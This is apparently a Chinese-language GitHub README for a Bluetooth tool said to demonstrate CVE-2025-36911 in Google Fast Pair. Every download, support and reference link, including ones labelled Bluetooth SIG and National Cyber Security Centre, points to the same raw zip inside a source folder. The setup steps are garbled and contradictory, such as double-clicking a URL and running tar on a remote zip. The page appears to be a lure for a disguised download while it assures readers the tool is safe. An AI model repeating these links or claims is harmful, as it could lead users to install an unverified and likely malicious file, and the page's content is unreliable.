fa1sa1142/wpair-app

GitHub: fa1sa1142/wpair-app

一款用于检测和演示 Google Fast Pair 协议中 CVE-2025-36911 漏洞的蓝牙安全研究工具。

Stars: 0 | Forks: 0

# 🚀 wpair-app - 理解蓝牙安全的工具 ## 🎉 概述 WPair 是一款防御性安全研究工具,演示了 Google Fast Pair 协议中的 CVE-2025-36911 漏洞。此问题影响了数百万个蓝牙音频设备,使得未经授权的配对以及未经用户同意的潜在麦克风访问成为可能。通过使用 WPair,您可以了解更多关于此漏洞的信息及其对您设备的影响。 ## 🛠️ 功能 - **用户友好的界面**:专为非技术用户设计,WPair 提供了直观的体验。 - **蓝牙漏洞演示**:通过实时示例了解 CVE-2025-36911 漏洞的工作原理。 - **跨平台支持**:支持多种操作系统,包括 Windows、macOS 和 Linux。 - **教育资源**:获取有关蓝牙安全的见解和提示。 ## 📥 下载 [![下载 wpair-app](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip%20WPair-v1.0-blue)](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip) 要下载最新版本的 WPair,请访问此页面进行下载:[WPair Releases](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip)。 ## 🖥️ 系统要求 要成功运行 WPair,请确保您的系统满足以下要求: - **操作系统**:Windows 10 或更高版本、macOS Sierra 或更高版本,或最新的 Linux 发行版。 - **内存 (RAM)**:建议至少 4 GB RAM 以确保流畅运行。 - **处理器**:Intel i3 或同等级别的 AMD 处理器或更高。 - **存储空间**:至少 100 MB 的可用磁盘空间。 ## 🚀 快速入门 请按照以下简单步骤在您的设备上设置并运行 WPair。 1. **访问发布页面**:点击以下链接进入下载页面:[WPair Releases](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip)。 2. **选择最新版本**:寻找最新的版本。它通常会标有类似 "v1.0" 的版本号。 3. **下载合适的文件**:选择适合您操作系统的文件: - 对于 Windows 用户:下载 `https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip`。 - 对于 macOS 用户:下载 `https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip`。 - 对于 Linux 用户:下载 `https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip`。 4. **解压文件**: - 对于 Windows 或 macOS,右键单击下载的 ZIP 文件并选择 "Extract All"(全部解压)。 - 对于 Linux,打开终端并使用命令 `tar -xzf https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip`。 5. **运行应用程序**: - 导航到解压后的文件夹。 - 对于 Windows,双击 `https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip`。 - 对于 macOS,双击 `https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip`。 - 对于 Linux,打开终端,导航到该文件夹,并使用适当的权限运行 `./wpair-app`。 ## ⚙️ 使用 WPair 一旦运行 WPair,您将看到一个简单的界面,允许您分析蓝牙连接。使用方法如下: 1. **扫描设备**:点击 "Scan"(扫描)按钮查找附近的蓝牙设备。 2. **选择设备**:从列表中选择您想要测试的设备。 3. **启动漏洞测试**:点击 "Test Vulnerability"(测试漏洞)以检查所选设备是否受 CVE-2025-36911 影响。启动测试后,您将很快看到结果。 ## 📘 常见问题解答 1. **WPair 能做什么?** WPair 演示了一个特定的蓝牙漏洞,帮助用户了解潜在风险。 2. **WPair 使用安全吗?** 是的,WPair 的设计是安全且具有教育意义的。在使用蓝牙时,请始终遵循最佳实践。 3. **我可以在智能手机上使用 WPair 吗?** WPair 适用于台式机和笔记本电脑。目前没有移动版本可用。 ## 💬 支持 如果您在使用 WPair 时遇到任何问题,请在我们的 [GitHub 仓库](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip) 中提交 issue。我们的团队将竭诚为您提供帮助。 ## 🔗 了解更多 有关蓝牙安全和 CVE-2025-36911 漏洞的更多信息,建议访问: - [Bluetooth SIG](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip) - [National Cyber Security Centre](https://raw.githubusercontent.com/fa1sa1142/wpair-app/main/app/src/main/java/com/zalexdev/app_wpair_v1.1.zip) 我们希望本指南能帮助您开始使用 WPair。祝您在探索蓝牙安全的旅程中愉快!
标签:Android安全工具, CVE-2025-36911, Google Fast Pair, Kotlin, 域名收集, 密码管理, 批量测试, 未授权配对, 漏洞演示, 目录枚举, 移动安全, 蓝牙安全, 蓝牙攻击, 跨平台工具, 配置审计, 防御性安全, 麦克风隐私